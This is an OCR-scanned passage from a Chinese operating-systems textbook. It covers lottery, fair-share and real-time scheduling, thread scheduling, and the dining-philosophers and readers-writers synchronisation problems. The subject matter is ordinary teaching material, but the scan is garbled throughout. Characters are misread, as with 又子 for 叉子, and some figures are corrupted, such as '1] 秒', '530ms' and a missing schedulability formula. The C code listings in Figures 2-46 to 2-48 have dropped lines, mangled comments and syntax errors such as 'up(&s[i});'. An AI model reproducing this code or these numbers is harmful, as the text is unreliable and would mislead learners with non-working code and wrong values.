为 了 实现 所 做 的 保证 ， 系 统 必 须 跟踪 各 个 进程 自 创建 以 来 已 使 用 了 多 少 CPU 时 间 。 然 后 它 计算 各 个 
进程 应 获得 的 CPU 时 间 ， 即 自 创建 以 来 的 时 间 除 以 x。 由 于 各 个 进程 实际 获得 的 CPU 时 间 是 已 知 的 ， 所 
以 很 容易 计算 出 真正 获得 的 CPU 时 间 和 应 获得 的 CPU 时 间 之 比 。 比 率 为 0.5 说 明 一 个 进程 只 获得 了 应 得 时 
间 的 一 半 ， 而 比率 为 2.0 则 说 明 它 获得 了 应 得 时 间 的 2 倍 。 于 是 该 算法 随后 转向 比率 最 低 的 进程 ， 直 到 该 
进程 的 比率 超过 它 的 最 接近 竞争 者 为 止 。 

6. 彩票 调度 

给 用 户 一 个 保证 ， 然 后 兑现 之 ， 这 是 个 好 想法 ， 不 过 很 难 实现 。 但 是 ， 有 一 个 既 可 给 出 类 似 预测 结果 而 
又 有 非常 简单 的 实现 方法 的 算法 ， 这 个 算法 称 为 彩票 调度 (lottery scheduling; Waldspurger 和 Weihl，1994)。 

其 基本 思想 是 为 进程 提供 各 种 系统 资源 (如 CPU 时 间 ) 的 彩票 。 一 旦 需要 做 出 一 项 调度 决策 时 ， 就 
随机 抽出 一 张 彩票 ， 拥 有 该 彩票 的 进程 获得 该 资源 。 在 应 用 到 CPU 调 度 时 ， 系 统 可 以 掌握 每 秒 钟 50 次 的 
一 种 彩票 ， 作 为 奖励 每 个 获奖 者 可 以 得 到 20ms 的 CPU 时 间 。 

为 了 说 明 George Orwell 关 于 “所 有 进程 是 平等 的 ， 但 是 某 些 进程 更 平等 一 些 ” 的 含义 ， 可 以 给 更 重 
要 的 进程 额外 的 彩票 ， 以 便 增 加 它们 获胜 的 机 会 。 如 果 出 售 了 100 张 彩票 ， 而 有 一 个 进程 持 有 其 中 的 20 
张 ， 那 么 在 每 一 次 抽奖 中 该 进程 就 有 20% 的 取胜 机 会 。 在 较 长 的 运行 中 ， 该 进程 会 得 到 20% 的 CPU。 相 
反 ， 对 于 优先 级 调度 程序 ， 很 难说 明 拥 有 优先 级 40 究 竟 是 什么 意思 ， 而 这 里 的 规则 很 清楚 : 拥有 彩票 f 
份额 的 进程 大 约 得 到 系统 资源 的 /份额 。 

彩票 调度 具有 若干 有 趣 的 性 质 。 例 如 ， 如 果 有 一 个 新 的 进程 出 现 并 得 到 一 些 彩票 ， 那 么 在 下 一 次 的 
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抽奖 中 ， 该 进程 会 有 同 它 持 有 彩票 数量 成 比例 的 机 会 赢得 奖励 。 换 句 话说 ， 彩 票 调度 是 反应 迅速 的 。 

如 果 和 希望 协作 进程 可 以 交换 它们 的 彩票 。 例 如 ,有 一 个 客户 进程 向 服务 器 进程 发 送 消 息 后 就 被 阻塞 ， 
该 客户 进程 可 以 把 它 所 有 的 彩票 交 给 服务 器 ， 以 便 增 加 该 服务 器 下 次 运行 的 机 会 。 在 服务 器 运行 完成 之 
后 ， 该 服务 器 再 把 彩票 还 给 客户 机 ， 这 样 客户 机 又 可 以 运行 了 。 事 实 上 ， 如 果 没 有 客户 机 ， 服 务 器 根本 
就 不 需要 彩票 。 

彩票 调度 可 以 用 来 解决 用 其 他 方法 很 难 解决 的 问题 。 一 个 例子 是 ， 有 一 个 视频 服务 器 ， 在 该 视频 服 
务 器 上 若干 进程 正在 向 其 客户 提供 视频 流 ， 每 个 视频 流 的 帧 速率 都 不 相同 。 假 设 这 些 进程 需要 的 帧 速率 
分 别 是 10、20 和 25 帧 / 秒 。 如 果 给 这 些 进 程 分 别 分 配 10、20 和 25 张 彩票 ， 那 么 它们 会 自动 地 按照 大 致 正 
确 的 比例 ( 即 10 : 20 : 25) 划分 CPU 的 使 用 。 

7. 公平 分 享 调度 

到 现在 为 止 ， 我 们 假设 被 调度 的 都 是 各 个 进程 自身 ， 并 不 关注 其 所 有 者 是 谁 。 这 样 做 的 结果 是 ， 如 
果 用 户 1 启动 9 个 进程 而 用 户 2 启 动 1 个 进程 ， 使 用 轮转 或 相同 优先 级 调度 算法 ， 那 么 用 户 1 将 得 到 90% 的 
CPU 时 间 ， 而 用 户 2 只 得 到 10% 的 CPU 时 间 。 

为 了 避免 这 种 情形 ， 某 些 系统 在 调度 处 理 之 前 考虑 谁 拥有 进程 这 一 因素 。 在 这 种 模式 中 ， 每 个 用 户 
分 配 到 CPU 时 间 的 一 部 分 ， 而 调度 程序 以 一 种 强制 的 方式 选择 进程 。 这 样 ， 如 果 两 个 用 户 都 得 到 获得 
50% CPU 时 间 的 保证 ， 那 么 无 论 一 个 用 户 有 多 少 进程 存在 ， 每 个 用 户 都 会 得 到 应 有 的 CPU 份额 。 

作为 一 个 例子 ， 考 虑 有 两 个 用 户 的 一 个 系统 ， 每 个 用 户 都 保证 获得 30%.CPU 时 间 。 用 户 1 有 4 个 进程 
A、B、C 和 D， 而 用 户 2 只 有 1 个 进程 E。 如 果 采 用 轮转 调度 ， 一 个 满足 所 有 限制 条 件 的 可 能 序列 是 : 

AEBECEDEABEBBECEDE… 
另 一 方面 ， 如 果 用 户 1 得 到 比 用 户 2 两 倍 的 CPU 时 间 ， 我 们 会 有 

ABECDEABECDE… 
当然 ， 大 量 其 他 的 可 能 也 存在 ， 可 以 进一步 探讨 ， 这 取决 于 如 何 定义 公平 的 含义 。 


2.4.4 实时 系统 中 的 调度 

实时 系统 是 一 种 时 间 起 着 主导 作用 的 系统 。 典 型 地 ， 一 种 或 多 种 外 部 物理 设备 发 给 计算 机 一 个 服务 
请 求 ， 而 计算 机 必须 在 一 个 确定 的 时 间 范 围 内 恰当 地 做 出 反应 。 例 如 ， 在 CD 播放 器 中 的 计算 机 获得 从 驱 
动 器 而 来 的 位 流 ， 然 后 必须 在 非常 短 的 时 间 间 隔 内 将 位 流转 换 为 音乐 。 如 果 计 算 时 间 过 长 ， 那 么 音乐 就 
会 听 起 来 有 异常 。 其 他 的 实时 系统 例子 还 有 ， 医 院 特别 护理 部 门 的 病人 监护 装置 、 飞 机 中 的 自动 驾驶 系 
统 以 及 自动 化 工厂 中 的 机 器 人 控制 等 。 在 所 有 这 些 例子 中 ， 正 确 的 但 是 迟到 的 应 答 往往 比 没 有 还 要 精 糕 。 

实时 系统 通常 可 以 分 为 硬 实时 (hard real time) 和 软 实时 (soft real time) ， 前 者 的 含义 是 必须 满足 
绝对 的 截止 时 间 ， 后 者 的 含义 是 虽然 不 希望 偶尔 错失 截止 时 间 ， 但 是 可 以 容忍 。 在 这 两 种 情形 中 ， 实 时 
性 能 都 是 通过 把 程序 划分 为 一 组 进程 而 实现 的 ， 其 中 每 个 进程 的 行为 是 可 预测 和 提前 掌握 的 。 这 些 进程 
一 般 寿 命 较 短 ， 并 且 极 快 地 运行 完成 。 在 检测 到 一 个 外 部 信号 时 ， 调 度 程序 的 任务 就 是 按照 满足 所 有 截 
止 时 间 的 要 求 调 度 进程 。 

实时 系统 中 的 事件 可 以 按照 响应 方式 进一步 分 类 为 周期 性 (以 规则 的 时 间 间 隔 发 生 ) 事件 或 非 周期 
性 (发 生 时 间 不 可 预知 ) 事件 。 一 个 系统 可 能 要 响应 多 个 周期 性 事件 流 。 根 据 每 个 事件 需要 处 理 时 间 的 
长 短 ， 系 统 甚至 有 可 能 无 法 处 理 完 所 有 的 事件 。 例 如 ， 如 果 有 m 个 周期 事件 ， 事 件 i 以 周期 P; 发 生 ， 并 需 
要 C, 秒 CPU 时 间 处 理 一 个 事件 ， 那 么 可 以 处 理 负载 的 条 件 是 


满足 这 个 条 件 的 实时 系统 称 为 是 可 调度 的 ， 这 意味 着 它 实际 上 能 够 被 实现 。 一 个 不 满足 此 检验 标准 的 进 
程 不 能 被 调度 ， 因 为 这 些 进程 共同 需要 的 CPU 时 间 总 和 大 于 CPU 能 提供 的 时 间 。 

作为 一 个 例子 ， 考 虑 一 个 有 三 个 周期 性 事件 的 软 实时 系统 ， 其 周期 分 别 是 100ms、200ms 和 500ms。 
如 果 这 些 事 件 分 别 需 要 50ms、30ms 和 100 ms 的 CPU 时 间 , 那么 该 系统 是 可 调度 的 , 因为 0.5+0.15+0.2<1。 
如 果 有 第 四 个 事件 加 入 ， 其 周期 为 1] 秒 ， 那 么 只 要 这 个 事件 是 不 超过 每 事件 150ms 的 CPU 时 间 ， 那 么 该 系 
统 就 仍然 是 可 调度 的 。 在 这 个 计算 中 隐 含 了 一 个 假设 ， 即 上 下 文 切换 的 开销 很 小 ， 可 以 忽略 不 计 。 
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实时 系统 的 调度 算法 可 以 是 静态 或 动态 的 。 前 者 在 系统 开始 运行 之 前 作出 调度 决策 ， 后 者 在 运行 过 
程 中 进行 调度 决策 。 只 有 在 可 以 提前 掌握 所 完成 的 工作 以 及 必须 满足 的 截止 时 间 等 全 部 信息 时 ， 静 态 调 
度 才能 工作 ， 而 动态 调度 算法 不 需要 这 些 限制 。 


2.4.5 策略 和 机 制 

到 目前 为 止 ， 我 们 隐 含 地 假设 系统 中 所 有 进程 分 属 不 同 的 用 户 ， 并 且 ， 进 程 间 相互 竞争 CPU。 通 常 
情况 下 确实 如 此 ， 但 有 时 也 有 这 样 的 情况 : 一 个 进程 有 许多 子 进 程 并 在 其 控制 下 运行 。 例 如 ， 一 个 数据 
库 管理 系统 可 能 有 许多 子 进程 ， 每 一 个 子 进程 可 能 处 理 不 同 的 请 求 ， 或 每 一 个 子 进程 实现 不 同 的 功能 
(如 请 求 分 析 ， 磁 盘 访问 等 ) 。 主 进程 完全 可 能 掌握 哪 一 个 子 进 程 最 重要 (或 最 紧迫 ) 而 哪 一 个 最 不 重要 。 
但 是 ， 以 上 讨论 的 调度 算法 中 没有 一 个 算法 从 用 户 进程 接收 有 关 的 调度 决策 信息 ， 这 就 导致 了 调度 程序 
很 少 能 够 做 出 最 优 的 选择 。 

解决 问题 的 方法 是 将 调度 机 制 (scheduling mechanism) 与 调度 策略 (scheduling policy) 分 离 这 个 
一 贯 的 原则 (Levin 等 人 ，1975) 。 也 就 是 将 调度 算法 以 某 种 形式 参数 化 ， 而 参数 可 以 由 用 户 进 程 填写 。 
再 次 考虑 数据 库 的 例子 。 假 设 内核 使 用 优先 级 调度 算法 ， 并 提供 了 一 条 可 供 进 程 设置 (并 改变 ) 优先 级 
的 系统 调用 。 这 样 ， 尽 管 父 进程 本 身 并 不 参与 调度 ， 但 它 可 以 控制 如 何 调度 子 进程 的 细节 。 在 这 里 ， 调 
度 机 制 位 于 内 核 ， 而 调度 策略 则 由 用 户 进程 决定 。 策 略 与 机 制 分 离 是 一 种 关键 性 思路 。 


2.4.6 线程 调度 

当 若干 进程 都 有 多 个 线程 时 ， 就 存在 两 个 层次 的 并 行 : 进程 和 线程 。 在 这 样 的 系统 中 调度 处 理 有 本 
质 差别 ， 这 取决 于 所 支持 的 是 用 户 级 线程 还 是 内 核 级 线程 或 两 者 都 支持 ) 。 

首先 考虑 用 户 级 线程 。 由 于 内 核 并 不 知道 有 线程 存在 ， 所 以 内 核 还 是 和 以 前 一 样 地 操作 ， 选 取 一 个 
进程 ， 假 设 为 A， 并 给 予 A 以 时 间 片 控制 。A 中 的 线程 调度 程序 决定 哪个 线程 运行 ， 假 设 为 A1。 由 于 多 
道 线 程 并 不 存在 时 钟 中 断 ， 所 以 这 个 线程 可 以 按 其 意愿 任意 运行 多 长 时 间 。 如 果 该 线程 用 完了 进程 的 全 
部 时 间 片 ， 内 核 就 会 选择 另 一 个 进程 运行 。 

在 进程 A 终于 又 一 次 运行 时 ， 线 程 Al 会 接着 运行 。 该 线程 会 继续 耗费 A 进程 的 所 有 时 间 ， 直 到 它 完 
成 工作 。 不 过 ， 该 线程 的 这 种 不 合群 的 行为 不 会 影响 到 其 他 的 进程 。 其 他 进程 会 得 到 调度 程序 所 分 配 的 
合适 份额 ， 不 会 考虑 进程 A 内 部 所 发 生 的 事 。 

现在 考虑 A 线 程 每 次 CPU 计算 的 工作 比较 少 的 情况 ， 例 如 ， 在 50ms 的 时 间 片 中 有 5ms 的 计算 工作 。 
于 是 ， 每 个 线程 运行 一 会 儿 ， 然 后 把 CPU 交 回 给 线程 调度 程序 。 这 样 在 内 核 切换 到 进程 B 之 前 ， 就 会 有 
序列 A1，A2，A3，A1，A2，A3，A1，A2，A3，Al1。 这 种 情形 可 用 图 2-44a 表 示 。 


线程 运行 进程 A 进程 B 进程 A 进程 B 
的 顺序 





2. 运行 时 系统 先 
取 一 个 线程 
1. 内 核 选 取 一 个 进程 1. 内 核 选取 一 个 线程 国 
可 能 : Al, A2,A3,Al,A2,A3 可 能 : Al, A2,A3,Al,A2,A3 
不 可 能 : Al1,B1,A2,B2,A3,B3 不 可 能 : Al,B1,A2,B2,A3,B3 


a) b) 
图 2-44 a) 用 户 级 线程 的 可 能 调度 ， 有 50ms 时 间 片 的 进程 以 及 每 次 运行 5ms CPU 的 线程 ，b) tja) 有 相同 
特性 的 内 核 级 线程 的 可 能 调度 


运行 时 系统 使 用 的 调度 算法 可 以 是 上 面 介绍 的 算法 中 的 任意 一 种 。 从 实用 考虑 ， 轮 转调 度 和 优先 级 
调度 更 为 常用 。 唯 一 的 局 限 是 ， 缺 乏 一 个 时 钟 中 断 运 行 过 长 的 线程 ， 但 由 于 线程 之 间 的 合作 关系 ， 这 通 
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常 也 不 是 问题 。 

现在 考虑 使 用 内 核 级 线程 的 情形 。 内 核 选择 一 个 特定 的 线程 运行 。 它 不 用 考虑 该 线程 属于 哪个 进程 ， 
不 过 如 果 有 必要 的 话 ， 它 可 以 这 样 做 。 对 被 选择 的 线程 赋予 一 个 时 间 片 ， 而 且 如 果 超过 了 时 间 片 ， 就 会 
强制 挂 起 该 线程 。 一 个 线程 在 530ms 的 时 间 片 内 ，5ms 之 后 被 阻塞 ， 在 30ms 的 时 间 段 中 ， 线 程 的 顺序 会 是 
Al，B1，A2，B2，A3，B3， 在 这 种 参数 和 用 户 线程 状态 下 ， 有 些 情形 是 不 可 能 出 现 的 。 这 种 情形 部 分 
通过 图 2-44b 刻 画 。 

用 户 级 线程 和 内 核 级 线程 之 间 的 差别 在 于 性 能 。 用 户 级 线程 的 线程 切换 需要 少量 的 机 器 指令 ， 而 内 
核 级 线程 需要 完整 的 上 下 文 切换 ， 修 改 内 存 映像 ， 使 高 速 缓存 失效 ， 这 导致 了 若干 数量 级 的 延迟 。 另 一 
方面 ， 在 使 用 内 核 级 线程 时 ， 一 旦 线程 阻塞 在 1O 上 就 不 需要 像 在 用 户 级 线程 中 那样 将 整个 进程 挂 起 。 

从 进程 A 的 一 个 线程 切换 到 进程 B 的 一 个 线程 ， 其 代价 高 于 运行 进程 A 的 第 2 个 线程 (因为 必须 修改 
内 存 映像 ， 清 除 内 存 高 速 缓存 的 内 容 ) ， 内 核对 此 是 了 解 的 ， 并 可 运用 这 些 信息 做 出 决定 。 例 如 ， 给 定 
两 个 在 其 他 方面 同等 重要 的 线程 ， 其 中 一 个 线程 与 刚好 阻塞 的 线程 属于 同一 个 进程 ， 而 另 一 个 线程 属于 
其 他 的 进程 ， 那 么 应 该 倾向 前 者 。 

另 一 个 重要 因素 是 用 户 级 线程 可 以 使 用 专 为 应 用 程序 定制 的 线程 调度 程序 。 例 如 ， 考 虑 图 2-8 中 的 
Web 服 务 器 。 假 设 一 个 工作 线程 刚刚 被 阻塞 ， 而 分 派 线程 和 另外 两 个 工作 线程 是 就 绪 的 。 那么， 应 该 运 
行 哪 一 个 线程 呢 ? 由 于 运行 时 系统 了 解 所 有 线程 的 作用 ， 所 以 会 直接 选择 分 派 线 程 接着 运行 ， 这 样 分 派 
线程 就 会 启动 另 一 个 工作 线程 运行 。 在 一 个 工作 线程 经 常 阻 塞 在 磁盘 IO 上 的 环境 中 ， 这 个 策略 将 并 行 
度 最 大 化 。 而 在 内 核 级 线程 中 ， 内 核 从 来 不 了 解 每 个 线程 的 作用 (虽然 它们 被 赋予 了 不 同 的 优先 级 )。 
Wit, 一般 而 言 ， 应 用 定制 的 线程 调度 程序 能 够 比 内 核 更 好 地 满足 应 用 的 需要 。 


2.5 经 典 的 IPC 问 题 


操作 系统 文献 中 有 许多 广 为 讨 论 和 分 析 的 有 趣 问题 ， 它 们 与 同步 方法 的 使 用 相关 。 以 下 几 节 将 讨论 
其 中 两 个 最 著名 的 问题 。 


2.5.1 哲学 家 就 餐 问 题 

1965 年 ，Dijkstra 提 出 并 解决 了 一 个 他 称 之 为 哲学 家 就 餐 的 同步 问题 。 从 那 时 起 ， 每 个 发 明 新 的 同步 
原 语 的 人 都 希望 通过 解决 哲学 家 就 餐 问题 来 展示 其 同步 原 语 的 精妙 之 处 。 这 个 问题 可 以 简单 地 描述 如 下 : 
五 个 哲学 家 围 坐 在 一 张 圆桌 周围 ， 每 个 哲学 家 面前 都 有 一 盘 通 心 粉 。 由 于 通 心 粉 很 请 ， 所 以 需要 两 把 又 
子 才能 夹 住 。 相 邻 两 个 盘子 之 间 放 有 一 把 又 子 ， 餐 桌 如 图 2-45 所 示 。 

哲学 家 的 生活 中 有 两 种 交替 活动 时 段 ; 即 吃饭 和 思考 (这 只 是 一 种 抽象 ， 即 对 哲学 家 而 言 其 他 活动 
都 无 关 紧 要 ) 。 当 一 个 哲学 家 觉得 俄 了 时 ， 他 就 试图 分 两 
次 去 取 其 左边 和 右边 的 又 子 ， 每 次 拿 一 把 ， 但 不 分 次 序 。 
如 果 成 功 地 得 到 了 两 把 叉子 ， 就 开始 吃饭 ， 吃 完 后 放下 又 
子 继续 思考 。 关 键 问 题 是 ， 能 为 每 一 个 哲学 家 写 一 段 描述 
其 行为 的 程序 ， 且 决 不 会 死 锁 吗 ? (要 求 拿 两 把 又 子 是 人 
为 规定 的 ， 也 可 以 将 意大利 面条 换 成 中 国 菜 ， 用 米饭 代替 
通 心 粉 ， 用 筷子 代替 又 子 。) 

图 2-46 给 出 了 一 种 直观 的 解法 。 过 程 take_fork 将 一 直 等 
到 所 指定 的 又 子 可 用 ， 然 后 将 其 取 用 。 不 过 ， 这 种 显然 的 解 
法 是 错误 的 。 如 果 五 位 哲学 家 同时 拿 起 左面 的 叉子， 就 没有 
人 能 够 拿 到 他 们 右面 的 又 子 ， 于 是 发 生死 锁 。 

可 以 将 这 个 程序 修改 一 下 ， 这 样 在 拿 到 左 又 后 ， 程 序 要 
查看 右面 的 又 子 是 否 可 用 。 如 果 不 可 用 ， 则 该 哲学 家 先 放下 左 
又 ， 等 一 段 时 间 ， 再 重复 整个 过 程 。 但 这 种 解法 也 是 错误 的 ， 
尽管 与 前 一 种 原因 不 同 。 可 能 在 某 一 个 瞬间 ， 所 有 的 哲学 家 都 图 2-45 哲学 家 的 午餐 时 间 
同时 开始 这 个 算法 ， 拿 起 其 左 又 ， 看 到 右 又 不 可 用 ， 又 都 放下 
左 又， 等 一 会 儿 ， 又 同时 拿 起 左 又 ， 如 此 这 样 永远 重复 下 去 。 对 于 这 种 情况 ， 所 有 的 程序 都 在 不 停 地 运行 ， 但 
都 无 法 取得 进展 ， 就 称 为 饥饿 (starvation) 。( 即 使 问题 不 发 生 在 意大利 餐馆 或 中 国 餐馆 ， 也 被 称 为 饥饿.) 
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#define N 5 刻 哲 学 家 的 数目 */ 
void philosopher(int i) 
{ 


i*i: 哲学 家 编号 ， 从 0 到 4 */ 
while (TRUE) { REKER */ 
parka ‘inp 人 # 拿 起 左边 又 子 */ 
e_fork(i); $ 3 ro 
take_fork((i+1) % N); f ET % 是 模 运算 ”/ 
PREKER E */ 
put_fork((i+1) % N); 人 # 将 右 叉 放 回 桌 上 */ 





图 2-46 哲学 家 就 餐 问题 的 一 种 错误 解法 


现在 读者 可 能 会 想 , “如果 哲学 家 在 拿 不 到 右边 又 子 时 等 待 一 段 随机 时 间 ， 而 不 是 等 待 相同 的 时 间 ， 这 样 
发 生 互 锁 的 可 能 性 就 很 小 了 ， 事 情 就 可 以 继续 了 。” 这 种 想法 是 对 的 ， 而 且 在 几乎 所 有 的 应 用 程序 中 ， 稍 后 再 
试 的 办 法 并 不 会 演化 成 为 一 个 问题 。 例 如 ， 在 流行 的 局 域 网 以 太 网 中 ， 如 果 两 台 计算 机 同时 发 送 包 ， 那 么 每 台 
计算 机 等 待 一 段 随机 时 间 之 后 再 尝试 。 在 实践 中 ， 该 方案 工作 良好 。 但 是 ， 在 少数 的 应 用 中 ， 人 们 和 希望 有 一 种 
能 够 始终 工作 的 方案 ， 它 不 能 因为 一 串 不 可 靠 的 随机 数字 而 导致 失败 (想象 一 下 核电 站 中 的 安全 控制 系统 )。 


#define N 5 /#* 哲学 家 数目 #/ 

#define LEFT (i+N-1)%N ”/*i 的 左 邻居 编号 */ 

#define RIGHT (i+1)%N Pi 的 右 邻 居 编 号 */ 

#define THINKING 0 /# 哲学 家 在 思考 */ 

#define HUNGRY 1 /* 哲学 家 试图 拿 起 叉子 */ 

#define EATING 2 /# 哲学 家 进餐 */ 

typedef int semaphore; 1* 信号 量 是 一 种 特殊 的 整 型 数据 */ 

int state[N]; 7* 数组 用 来 跟踪 记录 每 位 哲学 家 的 状态 */ 
semaphore mutex = 1; 7* i AAS ER */ 

semaphore s[N]; /* 每 个 哲学 家 一 个 信号 量 */ 


void philosopher(int i) is 哲学 家 编号 ， 从 0 到 N 一 1 */ 
while (TRUE) { /* ERIR */ 


} 
} 
void take_forks(int i) /* ii， 哲 学 家 编号 ， 从 0 到 N 一 1 */ 
{ 

down(&mutex); /* 进入 临界 区 */ 

state[i] = HUNGRY; /* 记录 和 哲学 家 i 处 于 饥饿 的 状态 */ 


test(i); * 尝试 获取 2 把 又 子 */ 
up(&mutex); /* 离 开 临 界 区 */ 
down(&s[i]); /* 如 果 得 不 到 需要 的 又 子 则 阻塞 */ 


} 
void put_forks(i) ži: 哲学 家 编号 ， 从 0 到 N 一 1 */ 
{ 


down(&mutex); 做 进入 临界 区 */ 
state[i] = THINKING; /* PER LAR REE */ 
test(LEFT); 上 # 检 查 左边 的 邻居 现在 可 以 吃 吗 */ 
test(RIGHT); /* 检查 右边 的 邻居 现在 可 以 吃 吗 */ 
up(&mutex); /# 离开 临界 区 */ 

} 


void test(i) *i: 哲学 家 编号 ， 从 0 到 N 一 1 */ 


if (state[i] == HUNGRY && state[LEFT] != EATING && state[RIGHT] != EATING) { 
state[i] = EATING; 
up(&s[i}); 





图 2-47 哲学 家 就 餐 问 题 的 一 个 解法 


96 种 2 人 章 


对 图 2-46 中 的 算法 可 做 如 下 改进 ， 它 既 不 会 发 生死 锁 又 不 会 产生 饥饿 : 使 用 一 个 二 元 信号 量 对 调用 
think 之 后 的 五 个 语句 进行 保护 。 在 开始 拿 叉子 之 前 ， 哲 学 家 先 对 互 斥 量 mutex 执 行 down 操 作 。 在 放 回 
又 子 后 ， 他 再 对 mutex 执 行 Up 操作 。 从 理论 上 讲 ， 这 种 解法 是 可 行 的 。 但 从 实际 角度 来 看 ， 这 里 有 性 能 
上 的 局 限 : 在 任何 一 时 刻 只 能 有 一 位 哲学 家 进餐 。 而 五 把 叉子 实际 上 可 以 允许 两 位 哲学 家 同时 进餐 。 

图 2-47 中 的 解法 不 仅 没 有 死 锁 ， 而 且 对 于 任意 位 哲学 家 的 情况 都 能 获得 最 大 的 并 行 度 。 算 法 中 使 用 
一 个 数组 state 跟 踪 每 一 个 哲学 家 是 在 进餐 、 思 考 还 是 饥饿 状态 〈 正 在 试图 拿 叉子 ) 。 一 个 哲学 家 只 有 在 
两 个 邻居 都 没有 进餐 时 才 允 许 进入 到 进餐 状态 。 第 i 个 哲学 家 的 邻居 则 由 宏 LEFT 和 RIGHT 定 义 , 换言之， 
车 i 为 2， 则 LEFT 为 1，RIGHT 为 3。 

该 程序 使 用 了 一 个 信号 量 数组 ， 每 个 信号 量 对 应 一 位 哲学 家 ， 这 样 在 所 需 的 又 子 被 占用 时 ， 想 进餐 
的 哲学 家 就 被 阻塞 。 注 意 ， 每 个 进程 将 过 程 philosopher 作 为 主 代码 运行 ， 而 其 他 过 程 take_forks、 
put_forks 和 test 只 是 普通 的 过 程 ， 而 非 单独 的 进程 。 


2.5.2 读者 - 写 者 问题 

哲学 家 就 餐 问 题 对 于 互 斥 访问 有 限 资 源 的 竞争 问题 (如 IO 设备 ) 一 类 的 建 模 过 程 十 分 有 用 。 另 一 
个 著名 的 问题 是 读者 一 写 者 问题 (Courtois 等 人 ，1971) ， 它 为 数据 库 访问 建立 了 一 个 模型 。 例 如 ， 设 想 
一 个 飞机 订 票 系统 ， 其 中 有 许多 竞争 的 进程 试图 读 写 其 中 的 数据 。 多 个 进程 同时 读数 据 库 是 可 以 接受 的 ， 
但 如 果 一 个 进程 正在 更 新 〈 写 ) 数据 库 ， 则 所 有 的 其 他 进程 都 不 能 访问 该 数据 库 ， 即 使 读 操作 也 不 行 。 
这 里 的 问题 是 如 何 对 读者 和 写 者 进行 编程 ? 图 2-48 给 出 了 一 种 解法 。 


typedef int semaphore; /* 运用 你 的 想象 #/ 

semaphore mutex = 1; /* 控制 对 rc 的 访问 */ 

semaphore db = 1; 人/# 控制 对 数据 库 的 访问 */ 

int rc = 0; 从 正在 读 或 者 即将 读 的 进程 数目 */ 


void reader(void) 


while (TRUE) { /* ERTER */ 
down(&mutex); /* 获得 对 rc 的 互 斥 访问 权 */ 
rc=rc+1i /# 现 在 又 多 了 一 个 读者 */ 
if (rc == 1) down(&db); /* 如 果 这 是 第 一 个 读者 
up(&mutex); /* 释放 对 rc 的 互 斥 访问 */ 
read_data_base( ); 信访 问 数据 */ 
down(&mutex); /* 获取 对 rc 的 互 斥 访问 */ 
rc=rc-1; 上 证 现在 减少 了 一 个 读者 */ 
if (rc == 0) up(&db); + 如 果 这 是 最 后 一 个 读者 …… */ 
up(&mutex); /* 释放 对 rc 的 互 斥 访问 */ 
Use_data_read(); /* 非 临 界 区 */ 

} 

} 


void writer(void) 


while (TRUE) { r pe K 
think_up_data( ); /* 获取 互 斥 访问 */ 
down(&db); 应 更 新 数据 */ 
write_data_base( ); RE Riyal */ 
up(&db); TIR 





图 2-48 读者 一 写 者 问题 的 一 种 解法 


在 该 解法 中 ， 第 一 个 读者 对 信号 量 db 执行 down 操 作 。 随 后 的 读者 只 是 递增 一 个 计数 器 rc。 当 读者 
离开 时 ， 它 们 递减 这 个 计数 器 ， 而 最 后 一 个 读者 则 对 信号 量 执行 up， 这 样 就 允许 一 个 被 阻塞 的 写 者 (an 
果 存 在 的 话 ) 可 以 访问 该 数据 库 。 
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在 该 解法 中 ， 隐 含 着 一 个 需要 注解 的 条 件 。 假 设 一 个 读者 正 使 用 数据 库 ， 另 一 个 读者 来 了 。 同 时 有 
两 个 读者 并 不 存在 问题 ， 第 二 个 读者 被 允许 进入 。 如 果 有 第 三 个 和 更 多 的 读者 来 了 也 同样 允许 。 

现在 ， 假 设 一 个 写 者 到 来 。 由 于 写 者 的 访问 是 排他 的 ， 不 能 允许 写 者 进入 数据 库 ， 只 能 被 挂 起 。 只 
要 还 有 一 个 读者 在 活动 ， 就 允许 后 续 的 读者 进来 。 这 种 策略 的 结果 是 ， 如 果 有 一 个 稳定 的 读者 流 存 在 ， 
那么 这 些 读者 将 在 到 达 后 被 允许 进入 。 而 写 者 就 始终 被 挂 起 ， 直 到 没有 读者 为 止 。 如 果 来 了 新 的 读者 ， 
比如 ， 每 2 秒 钟 一 个 ， 而 每 个 读者 花费 5 秒 钟 完成 其 工作 ， 那 么 写 者 就 永远 没有 机 会 了 。 

为 了 避免 这 一 情形 ， 可 以 稍微 改变 一 下 程序 的 写法 : 在 一 个 读者 到 达 ， 且 一 个 写 者 在 等 待 时 ， 读 者 
在 写 者 之 后 被 挂 起 ， 而 不 是 立即 允许 进入 。 用 这 种 方式 ， 在 一 个 写 者 到 达 时 如 果 有 正在 工作 的 读者 ， 那 
么 该 写 者 只 要 等 待 这 个 读者 完成 ， 而 不 必 等 候 其 后 面 到 来 的 读者 。 该 解决 方案 的 缺点 是 ， 并 发 度 和 效率 
较 低 。Courtois 等 人 给 出 了 一 个 写 者 优先 的 解法 。 详 细 内 容 请 参阅 他 的 论文 。 


2.6 有 关 进 程 与 线程 的 研究 


第 1 章 介绍 了 当前 有 关 操作 系统 结构 的 研究 工作 ， 在 本 章 和 后 续 章 节 中 ， 我 们 将 专注 更 多 更 细 的 研 
究 工作 ， 本 章 先 从 有 关 进 程 的 研究 开始 。 虽 然 这 些 问题 最 终 都 将 得 到 解决 ， 但 总 有 一 些 问题 会 比 其 他 问 
题 的 解决 方案 更 成 熟 。 多 数 研究 工作 不 再 继续 围绕 有 数 十 年 历史 的 问题 ， 而 是 针对 新 的 问题 。 

例如 ， 进 程 问 题 就 已 经 有 了 成 熟 的 解决 方案 。 几 乎 所 有 系统 都 把 进程 视 为 一 个 容器 ， 用 以 管理 相关 
资源 ， 如 地 址 空间 、 线 程 、 打 开 的 文件 、 权 限 保护 等 。 不 同 的 系统 管理 进程 资源 的 基本 想法 大 致 相同 ， 
只 是 在 工程 处 理 上 略 有 差别 ， 相 关 领 域 也 很 少 有 新 的 研究 。 

线程 是 比 进程 更 新 的 概念 , 但 也 同样 经 过 了 深入 的 思考 。 现 在 线程 的 相关 研究 仍然 时 常 出 现 ， 例 如 ， 
多 处 理 器 上 的 线程 集群 (Tam 等 人 ，2007)、Linux 等 现代 操作 系统 对 于 海量 线程 在 多 核 处 理 器 上 的 可 扩 
展 性 (Boyd-Wickizer, 2010), 

进程 执行 过 程 的 记录 和 重 放 也 是 一 个 非常 活跃 的 研究 领域 (Viennot 等 人 ，2013)。 重 放 技术 可 以 帮 
助 开 发 者 追踪 一 些 难以 发 现 的 程序 漏洞 ， 也 有 助 于 程序 安全 领域 的 专家 对 程序 进行 检查 。 

